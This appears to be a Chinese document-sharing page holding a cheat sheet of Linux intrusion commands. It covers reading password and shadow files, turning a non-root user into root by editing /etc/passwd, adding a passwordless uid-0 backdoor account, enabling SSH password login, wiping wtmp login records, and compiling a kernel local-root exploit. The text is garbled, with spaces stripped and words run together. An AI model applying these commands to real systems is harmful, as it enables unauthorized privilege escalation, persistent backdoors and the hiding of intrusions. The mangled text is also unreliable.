还剩1页未读,继续阅读
文本内容:
linux入侵常用命令总结电脑资料cat/etc/passwd查看linux用户cat/etc/shadow查看用户密码需要root权限cat/etc/sysconfig/work-scripts/ifcfg-ethnN代表网卡号查看所在网卡的ip信息ifconfig查看本机ip信息cat/etc/resolv.conf查看DNS信息bash-i在反弹的shell中使用可以直观显示命令bashprompt:当你以普通限权用户身份进入的时候,一般你会有一个类似bash$的prompt,bash#系统变量:试着echo$USER/$EUID系统应该会告诉你它认为你是什么用户echo1/proc/sys//ipv4/ifforward是不是你写错了应该是echo1/proc/sys//ipv4/ipforwardvim/proc/sys//ipv4/ipforward吧默认是0也就是内核不进行数据包过滤改为1让内核对数据包进行filter处理!stat-an|grepLISTEN|grep:80查看端口service--status-all|greprunningservice--status-all|grep查看运行效劳lsbrelease-a查看系统版本重启ssh效劳/usr/sbin/sshdstop/usr/sbin/sshdstartssdconfig文件里PasswordAuthenticationno将其改为PasswordAuthenticationyes远程ssh才可否那么显示Aessdenied其中Usepamyes可能用来建立pam方式login,比方从其它linux主机ssh到效劳端,如果关闭,那么不能翻开.su的菜鸟用法先chomod777/etc/passwd然后修改bin用户的gid和uid为0然后passwd设置bin的密码然后cp/bin/bash/sbin/nologin然后su的时候su-bin就可以到rootshell了,这个原理就是当ssh不允许root用ssh终端登陆的时候,我们又不知道root密码,的一种很菜鸟的做法还可以这样sed-is/bin:x:1:1/bin:x:0:1/g/etc/passwdgprtcl
2.c–olocal–static–Wallechonosec:x:0:0::/:/bin/sh/etc/passwdechonosec::-1:-1:-1:-1:-1:-1:500/etc/shadow清空last记录cp/dev/null/var/log/wtmp-----ddif=/dev/zerof=yourfilebs=10Mcount=10建立一个100m的大文件在利用LinuxKernel=
2.
6.
17.4procLocalRootExploit提权的时候要用到的模板内容仅供参考 。